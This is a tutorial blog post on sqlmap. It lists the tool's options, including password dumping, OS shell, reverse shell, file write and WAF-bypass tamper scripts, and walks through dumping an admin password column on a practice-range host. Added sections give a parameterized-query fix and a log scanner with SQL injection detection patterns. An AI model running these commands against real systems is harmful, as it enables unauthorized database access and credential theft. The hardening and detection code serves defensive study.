What is sqlmap and how to use it
2022-07-29 05:42:00 【adeylinux】
Preface:
Sqlmap is an essential tool for every penetration test engineer.
I. What is Sqlmap?
In this era of priceless data, database security has become the top priority, so I have compiled the most commonly used parameters of sqlmap, the penetration testing tool for database security.
sqlmap is an automated SQL injection penetration tool: fingerprinting, injection mode selection and data retrieval after a successful injection are all automated, and sqlmap also ships with many scripts, although these are rarely used in practical testing. sqlmap is written in Python, so capable users can write their own scripts.
sqlmap supports vulnerability detection against MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and other databases.
II. How to use Sqlmap:
1. Basic parameters:
-u # Injection point
-g # Google search
-f # Fingerprint the database type
-b # Get database version (banner) information
-p # Specify the parameters to test (?page=1&id=2 -p "page,id")
-D "" # Specify the database name
-T "" # Specify the table name
-C "" # Specify the column(s)
-s "" # Save the injection session to a file; it can be interrupted and resumed next time (save: -s "xx.log", resume: -s "xx.log" --resume)
--columns # List columns
--current-user # Get the current user name
--current-db # Get the current database name
--users # List all database users
--passwords # Get the passwords of all database users
--privileges # View user privileges (--privileges -U root)
-U # Specify the database user
--dbs # List all databases
--tables -D "" # List the tables in the specified database
--columns -T "user" -D "mysql" # List all columns of the user table in the mysql database
--dump-all # Dump all databases and all tables
--exclude-sysdbs # Exclude system databases; only user-created databases and tables are listed
--dump -T "" -D "" -C "" # Dump the data of the specified columns of a table in the specified database (--dump -T users -D master -C surname)
--dump -T "" -D "" --start 2 --top 4 # Dump entries 2-4 of the specified table in the specified database
--dbms # Specify the database (MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase, SAP MaxDB)
--os # Specify the operating system (Linux, Windows)
--sql-shell # Write shell
--delay # Delay between requests
--safe-freq # Safe-request frequency
-v # Verbosity level (0-6)
0: Show only Python tracebacks, errors and critical messages.
1: Show information and warning messages.
2: Show debug messages.
3: Show injected payloads.
4: Show HTTP requests.
5: Show HTTP response headers.
6: Show HTTP response page content.
--privileges # View privileges
--is-dba # Whether the current user is a database administrator
--roles # Enumerate database user roles
--udf-inject # Inject user-defined functions (to gain system privileges)
--union-check # Check whether UNION injection is supported
--union-cols # UNION query column range
--union-test # UNION statement test
--union-use # Use UNION injection
--union-tech orderby # UNION combined with ORDER BY
--method "POST" --data "" # Submit data via POST (--method "POST" --data "page=1&id=2")
--cookie "separate values with ;" # Cookie injection (--cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low")
--referer "" # Spoof the Referer header (--referer "http://www.baidu.com")
--user-agent "" # Custom User-Agent
--proxy "http://127.0.0.1:8118" # Inject through a proxy
--string "" # Specify a keyword string
--threads # Use multiple threads (--threads 3)
--sql-shell # Execute arbitrary SQL commands
--sql-query # Execute the specified SQL statement (--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1")
--file-read # Read the specified file
--file-write # Write a local file to the target (--file-write /test/test.txt --file-dest /var/www/html/1.txt; the local test.txt is written to 1.txt on the target)
--file-dest # Absolute path of the file to be written on the target
--os-cmd=id # Execute a system command
--os-shell # Interactive system shell
--os-pwn # Reverse shell (--os-pwn --msf-path=/opt/framework/msf3/)
--msf-path= # Absolute path to Metasploit (--msf-path=/opt/framework/msf3/)
--os-smbrelay #
--os-bof #
--reg-read # Read the Windows registry
--priv-esc #
--time-sec= # Delay setting; the default --time-sec=5 means 5 seconds
-p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" # Inject via the specified User-Agent
--eta # Blind injection
Dictionaries under /pentest/database/sqlmap/txt/:
common-columns.txt # Column-name dictionary
common-outputs.txt
common-tables.txt # Table-name dictionary
keywords.txt
oracle-default-passwords.txt
user-agents.txt
wordlist.txt
Practical operation (Windows demonstration):
Recommended practice range: https://hack.zkaq.cn/
python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1"
Next, query the database names:
python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --dbs
The query returns 3 databases: information_schema, maoshe, test.
The command to query the tables is as follows:
python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe --tables
The query shows that the maoshe database has 4 tables: admin, dirs, news, xss.
Query all column names of the table:
python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin --columns
The query shows that the admin table has two columns: column, type.
Query the data (jokingly known as the command that gets you prison food):
The command is as follows (example):
python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin -C password --dump
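Everything in this walkthrough hinges on the `?id=1` parameter being pasted into the SQL text. As an added example (not code from the original post or from the lab site), here is a Python/sqlite3 request handler in both forms: the vulnerable concatenation that gives sqlmap its injection point, and the parameterized version that closes it. The schema, the rows and the sample inputs are constructed for illustration; only the table names `news` and `admin` are borrowed from the walkthrough.

```python
import sqlite3


def make_db():
    """Constructed in-memory database; the table names echo the walkthrough, the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news  VALUES (1, 'Welcome'), (2, 'Maintenance window');
        INSERT INTO admin VALUES (1, 'admin', 'placeholder-hash');
    """)
    return conn


def news_by_id_vulnerable(conn, id_param):
    """The `?id=1` handler as sqlmap finds it: the raw parameter becomes part of the SQL text."""
    sql = "SELECT id, title FROM news WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def news_by_id_safe(conn, id_param):
    """Hardened handler: validate the type first, then bind the value as a parameter.

    The driver sends the value separately from the statement, so it is never parsed as SQL.
    """
    try:
        id_value = int(id_param)
    except (TypeError, ValueError):
        return []  # reject anything that is not an integer id
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (id_value,)).fetchall()


def compare(id_param):
    """Run the same input through both handlers; returns (vulnerable_rows, safe_rows)."""
    conn = make_db()
    try:
        vulnerable = news_by_id_vulnerable(conn, id_param)
    except sqlite3.Error as exc:
        # Malformed input surfaces as a database error; error-based detection keys on exactly this.
        vulnerable = f"SQL error: {exc}"
    return vulnerable, news_by_id_safe(conn, id_param)


if __name__ == "__main__":
    for sample in ("1", "1 OR 1=1", "abc"):
        print(repr(sample), "->", compare(sample))
```

With the legitimate input `1` both handlers return the same row; with a tautology appended, the concatenating handler returns every row of the table while the parameterized one rejects the input outright, and a non-numeric value produces a database error from the first handler and an empty result from the second. The type check plus parameter binding is what removes the injection point, independent of which tamper script or technique the scanner tries.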
Extended instructions:
Command: --proxy. Effect: access the target site through a proxy. Syntax: python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --proxy="http://127.0.0.1:8087/"
Command: --random-agent. Effect: use a randomly chosen User-Agent header. Syntax: python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --proxy="http://127.0.0.1:8087/" --random-agent
Command: --cookie. Effect: use the site's session identity to test the target. Syntax: python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --cookie="A=14; jwt_id=10225; hyphp_lang=zh-CN; PHPSESSID=l88pctr08m1goksmt490ucqoec; Track_HEX=bptp%252B0qqBV3OTRLgJTnOdWYZg1Ht%25252FJZ1KsnKyK417OavpiHxZ%252BaTI4QERFEDhOehx%25252FFmM2XDdAetlserL65nSVF22msWlo6qytqaJvebChhDDbuiXJ9ghGMJBD6M0A30r%25252FN6etw8lwT17k%25252FlPf19i5HmXUM%253D; token=79995007156da9089ba3e8bfb784fc7c34c20f84; jwt_time=1649140798"
Command: --level. Effect: increase the test intensity.
The higher the level, the longer the run takes and the higher the probability of discovering vulnerabilities.
Command: --risk. Effect: set the risk level.
Syntax: python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --level 3 --risk 2
Command: --batch. Effect: use the default answer for every y/n prompt.
python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --level 3 --risk 2 --batch
Command: --tamper. Effect: use tamper scripts to bypass IPS, WAF, etc. Syntax: python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --tamper="tamper/between.py"
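The --random-agent and --tamper options exist because the default sqlmap User-Agent (the `sqlmap/...` string shown in the parameter list) and the stock payloads are easy to spot in server logs. The following is an added example, not part of the original post: a small Python log scanner that flags requests carrying either the default sqlmap User-Agent or the UNION, boolean and time-based payload patterns that sqlmap automates, run over a few constructed access-log lines in combined log format. The log lines, the IP addresses and the pattern list are assumptions for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines in combined log format (not real traffic).
# Line 2 carries the default sqlmap User-Agent quoted in the parameter list; lines 3 and 4
# carry time-based and UNION payloads sent with a browser-like User-Agent (as --random-agent would).
SAMPLE_LOG = """\
10.0.0.5 - - [29/Jul/2022:05:42:00 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/102.0"
10.0.0.9 - - [29/Jul/2022:05:42:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
10.0.0.9 - - [29/Jul/2022:05:42:02 +0000] "GET /?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.9 - - [29/Jul/2022:05:42:03 +0000] "GET /?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL-- HTTP/1.1" 200 800 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.7 - - [29/Jul/2022:05:42:04 +0000] "GET /?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15)"
"""

# Combined log format: ip ident user [timestamp] "METHOD target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query-string fragments typical of the UNION, boolean-based and time-based techniques sqlmap automates.
PAYLOAD_RE = re.compile(
    r"\bUNION\b.{0,40}\bSELECT\b|"
    r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|"
    r"\bWAITFOR\s+DELAY\b|"
    r"\b(?:AND|OR)\s+\d+\s*=\s*\d+|"
    r"\binformation_schema\b|"
    r"'\s*(?:--|#)",
    re.IGNORECASE,
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    # Decode the query string so percent-encoded payloads (%20, %28, ...) can be matched as text.
    entry["query"] = unquote_plus(urlsplit(entry["target"]).query)
    return entry


def indicators(entry):
    """Return the list of indicator names that fire for one parsed request."""
    found = []
    if entry["ua"].lower().startswith("sqlmap/"):
        found.append("sqlmap-user-agent")
    if PAYLOAD_RE.search(entry["query"]):
        found.append("sqli-payload")
    return found


def scan(log_text):
    """Aggregate flagged requests per client IP: {ip: {"hits": n, "indicators": set, "targets": [...]}}."""
    report = defaultdict(lambda: {"hits": 0, "indicators": set(), "targets": []})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        found = indicators(entry)
        if not found:
            continue
        rec = report[entry["ip"]]
        rec["hits"] += 1
        rec["indicators"].update(found)
        rec["targets"].append(entry["target"])
    return dict(report)


if __name__ == "__main__":
    for ip, rec in scan(SAMPLE_LOG).items():
        print(ip, rec["hits"], sorted(rec["indicators"]), rec["targets"])
```

On the sample, only 10.0.0.9 is reported, with three hits and both indicator types, while the two ordinary requests for `id=1` and `id=42` stay quiet. Matching on the User-Agent alone would catch just the first of its requests, which is exactly what --random-agent is for; the payload patterns carry the rest, and tamper scripts such as the between.py named above exist to rewrite operators so that fixed patterns like these stop matching. A scanner of this kind is therefore a supplement to, not a substitute for, removing the injectable parameter.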
Summary
The above is the content of this chapter, mainly covering what sqlmap is and how to use it. Please give it a like.